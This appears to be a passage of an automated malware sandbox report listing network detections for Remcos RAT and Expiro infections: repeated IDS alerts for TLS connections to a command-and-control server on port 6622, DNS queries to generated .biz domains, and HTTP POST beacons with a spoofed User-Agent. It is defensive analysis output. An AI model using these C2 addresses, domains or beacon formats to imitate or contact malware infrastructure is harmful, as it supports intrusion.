              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50153 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50162 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50297 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2051652 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (napws .biz) : 192.168.2.4:62580 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50261 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50226 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:56539 -> 82.112.184.197:80
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50277 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50285 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56569 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50205 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50327 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50280 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.4:56068 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50331 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56521 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56534 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56554 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56548 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50215 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50233 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56608 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56590 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56602 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56551 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56593 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50340 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56544 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56553 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50244 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56550 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56524 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56565 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56529 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56540 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56604 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56559 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56567 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56606 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50115 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50288 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56607 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2051654 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (cikivjto .biz) : 192.168.2.4:59374 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50319 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50273 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56584 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50324 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50337 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56603 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56526 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.4:61194 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.4:53761 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56541 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50291 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56549 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56598 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2051650 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz) : 192.168.2.4:53060 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50221 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2051653 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz) : 192.168.2.4:58104 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50303 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2051652 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (napws .biz) : 192.168.2.4:49262 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56557 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56562 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56543 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50313 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56555 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56558 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50334 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50249 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.4:58529 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50344 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50267 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56536 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56538 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56556 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56596 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56577 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56560 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56547 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56573 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56580 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56587 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50255 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56516 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56545 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50310 -> 204.10.160.212:6622
              Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 3.254.94.185 80
              Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 204.10.160.212 6622
              Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 3.94.10.34 80
              Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 34.246.200.160 80
              Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 172.234.222.143 80
              Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 18.208.156.248 80
              Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 34.211.97.45 80
              Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 208.100.26.245 80
              Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 35.164.78.200 80
              Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 165.160.13.20 80
              Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 44.213.104.86 80
              Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 44.221.84.105 80
              Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 85.214.228.140 80
              Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 54.244.188.177 80
              Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 13.251.16.150 80
              Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 47.129.31.212 80
              Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 82.112.184.197 80
              Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 18.141.10.107 80
              Source: unknown DNS traffic detected: English language letter frequency does not match the domain names
              Source: unknown Network traffic detected: DNS query count 128
              Source: global traffic TCP traffic: 192.168.2.4:49730 -> 204.10.160.212:6622
              Source: global traffic DNS traffic detected: number of DNS queries: 128
              Source: global trafficHTTP traffic detected: POST /bvjounbjkagqnta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /rsmfnaxurgxpde HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /dqlfliuucamv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /tacyehq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /aky HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /bh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /xitm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /hbj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /gvnfcd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /elpwpt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /yywraaixbnedu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /dgeuecv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ddsolxmfcvq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /nljwtdwahh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /xjjg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ibdxbfqrqufvuu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /byear HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ipnvn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /liar HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /jpdlcoeoakm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /d HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /emmmpldkokdghu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /eyywnnlobvqfg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /fwbtaqdcjwd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /gcsq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /hbkwpskje HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /js HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /feejetjxxjumqw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /scwkixjormncu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
